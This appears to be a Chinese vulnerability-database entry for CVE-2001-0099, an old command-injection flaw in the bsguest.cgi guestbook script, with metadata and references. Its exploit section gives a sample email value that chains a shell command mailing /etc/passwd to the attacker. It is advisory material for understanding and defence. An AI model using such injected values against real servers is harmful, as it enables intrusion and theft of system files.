bsguest.cgi留言簿脚本漏洞

bsguest.cgi留言簿脚本漏洞

漏洞ID 1106145 漏洞类型 未知
发布时间 2000-12-20 更新时间 2005-05-02
图片[1]-bsguest.cgi留言簿脚本漏洞-安全小百科CVE编号 CVE-2001-0099
图片[2]-bsguest.cgi留言簿脚本漏洞-安全小百科CNNVD-ID CNNVD-200102-032
漏洞平台 CGI CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/20524
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200102-032
|漏洞详情
bsguest.cgi留言簿脚本存在漏洞。远程攻击者可以借助邮件地址的shell元字符执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/2159/info

An input validation vulnerability exists in Brian Stanback's bsguest.cgi, a script designed to coordinate guestbook submissions from website visitors.

The script fails to properly filter ';' characters from the user-supplied email address collected by the script.

As a result, maliciously-formed values for this field can cause the the script to run arbitrary shell commands with the privilege level of the web server.


Attacker enters his email address as <[email protected]>

'[email protected];/usr/sbin/sendmail [email protected] < /etc/passwd',

server mails a confirmation letter along with the passwd file to the attacker.
|参考资料

来源:XF
名称:bsguest-cgi-execute-commands
链接:http://xforce.iss.net/static/5796.php
来源:www.stanback.net
链接:http://www.stanback.net/
来源:BUGTRAQ
名称:20001221BSScriptsVulnerabilities
链接:http://archives.neohapsis.com/archives/bugtraq/2000-12/0390.html
来源:XF
名称:bsguest-cgi-execute-commands
链接:http://xforce.iss.net/static/5796.php

相关推荐: Linux/x86 – Add Root User (t00r) To /etc/passwd + Anti-IDS Shellcode (116 bytes)

Linux/x86 – Add Root User (t00r) To /etc/passwd + Anti-IDS Shellcode (116 bytes) 漏洞ID 1054689 漏洞类型 发布时间 2004-09-26 更新时间 2004-09-26…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享